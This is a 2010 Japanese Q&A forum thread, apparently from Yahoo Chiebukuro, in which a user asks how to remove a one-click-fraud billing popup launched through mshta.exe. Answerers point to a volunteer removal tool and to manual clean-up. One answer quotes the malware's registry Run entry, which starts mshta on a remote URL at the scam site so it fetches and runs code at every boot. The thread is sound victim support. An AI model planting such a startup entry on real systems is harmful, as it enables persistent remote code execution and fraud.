ここから本文です

架空請求の画面を消したいのですが サイト名は 「エロ動画ワールド」 URLは ...

akt********さん

2010/8/2520:31:26

架空請求の画面を消したいのですが

サイト名は
「エロ動画ワールド」
URLは
「*ttp://birch30grey.ero0101.com」

タスクマネージャーより「mshta.exe」によるものだと分かり
システム構成ユーティリティから悪意のあるものをスタートアップから消そうとしたのですが見つからず
同じくレジストリエディタの「RUN」を見てみたのですが悪意のあるものは見つかりませんでした

どうすればこの画像は消えてくれますか?

閲覧数:
3,231
回答数:
2
お礼:
100枚

違反報告

ベストアンサーに選ばれた回答

プロフィール画像

カテゴリマスター

kaz********さん

2010/8/2521:20:41

エロ動画ワールド *.ero0101.comは有志の開発してくれた「ワンクリウエア駆除ツール(test版)更新停止中」の対象サイトです、有難く使わせてもらいましょう。

保存したファイルをダブルクリックで解凍(展開)後、「del_1cw」フォルダ内の「del_1cw.bat」を実行してください。
Vista,7の方は、「vista1.bat」,「vista2.reg」の順に完了後ダブルクリックをして下さい。「del_1cw.bat」は実行しないで下さい。
うまく動作しなかった場合は、セーフモードでの実行を試してみて下さい。
http://sasi40dx.cs.land.to/

質問した人からのコメント

2010/8/25 23:15:55

降参 手順通りにやった所、キレイサッパリ無くなりました。ありがとうございます

ベストアンサー以外の回答

1〜1件/1件中

2010/8/2521:44:34

エロ動画ワールド


************
sasi40さんで解決しますね。確認しました。



ttp://birch30grey.ero0101.com

エロ動画ワールド


http://www.virustotal.com/file-scan/report.html?id=9f17728156827776...


O4 - HKCU\..\Run: [system_boot_fda75962d83387eb048779ac5745b12c] C:\Windows\system32\mshta h ttp://birch30grey.ero0101.com/reg2.php?cid=fda75962d83387eb048779ac5745b12c

タスクスケジューラ登録型ワンクリhta


手動駆除の場合は、
accuphase65さんの紹介する手法autoruns for windows
あるいはタスクスケジューラを起動して「fda75962d83387eb048779ac5745b12c」が登録されているから、これを「削除」




もっとも
sasi40さんで解決できるから、これが安全だよね・


神様sasi40さん「ありがとうございます」


今度、「すき家の牛丼定食+ビール」で乾杯しましょう!?
(ボンビーなので)


***********:

自力解決できない場合は、専門家サイトへ移動して相談しましょう。

http://6007.teacup.com/aisudaikon/bbs

http://o.z-z.jp/pcbbs.cgi?id=daresukansei&th=2&p3



kazuofさん、「ご苦労様」です。